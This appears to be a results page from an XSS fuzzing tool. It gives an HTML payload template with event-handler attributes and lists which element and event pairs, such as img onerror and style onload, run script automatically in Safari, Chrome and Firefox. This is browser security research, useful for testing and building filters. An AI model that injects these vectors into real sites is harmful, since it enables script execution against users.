XSS vectors that execute automatically
This vector shows which events fire without user interaction
Created by: Gareth Heyes
Created on: 4/17/2024, 6:18:25 PM
Updated on: 5/14/2024, 12:26:27 AM
Vector type: XSS
Template used:
<$[data1] src=1 srcdoc=1 data=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]>
<$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]>
Your browser was detected as:
Detecting... Detecting...
Fuzz results:
Safari 17.4.1
Results
Found 5
| Data |
|---|
| audio->onerror |
| Data |
|---|
| audio->onloadstart |
| Data |
|---|
| img->onerror |
| Data |
|---|
| video->onerror |
| Data |
|---|
| video->onloadstart |
Chrome 124.0.0.0
Results
Found 7
| Data |
|---|
| audio->onerror |
| Data |
|---|
| audio->onloadstart |
| Data |
|---|
| iframe->onload |
| Data |
|---|
| img->onerror |
| Data |
|---|
| style->onload |
| Data |
|---|
| video->onerror |
| Data |
|---|
| video->onloadstart |
Firefox 125.0
Results
Found 5
| Data |
|---|
| audio->onloadstart |
| Data |
|---|
| img->onerror |
| Data |
|---|
| object->onerror |
| Data |
|---|
| style->onload |
| Data |
|---|
| video->onloadstart |